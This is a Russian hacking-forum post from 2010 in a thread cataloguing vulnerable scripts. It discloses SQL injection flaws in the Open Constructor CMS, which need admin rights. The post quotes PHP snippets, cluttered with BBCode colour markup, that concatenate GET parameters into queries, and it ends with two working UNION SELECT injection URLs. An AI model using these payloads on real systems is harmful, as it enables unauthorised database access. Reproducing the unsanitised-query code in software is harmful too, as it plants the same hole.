Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #4  
Старый 02.11.2010, 20:23
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами: 8456912

Репутация: 17
По умолчанию
Уязвимости Open Constructor

Тип уязвимости: SQL inj

Зависимости: Права админа

Куски уязвимых кодов:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT id, ds_type, obj_type FROM objects WHERE id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);[/[/COLOR][COLOR="#0000BB"]B[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);

 if([/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'obj_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php?id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);

 die();

 }

[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR] 
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_id'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAllPages[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]WCDB[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]bo[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"](

[/COLOR][COLOR="#DD0000"]'SELECT id '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'FROM dshtmltext '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'WHERE ds_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id

[/COLOR][COLOR="#007700"]);

 while([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]))

 unset([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]]);

[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);

 } else {

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_record[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);

 }

 require_once([/COLOR][COLOR="#0000BB"]LIBDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/syntax/syntaxhighlighter._wc'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]= array();

[/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'~[/COLOR][COLOR="#0000BB"]allowedTags[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PREG_PATTERN_ORDER[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$allowed[/COLOR][COLOR="#007700"]= (array) @[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]wrapDocument[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$save[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'createdoc'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>

[/COLOR][/COLOR] 
Примеры:

localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--



localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4 ,5,6,7,8--
 
Ответить с цитированием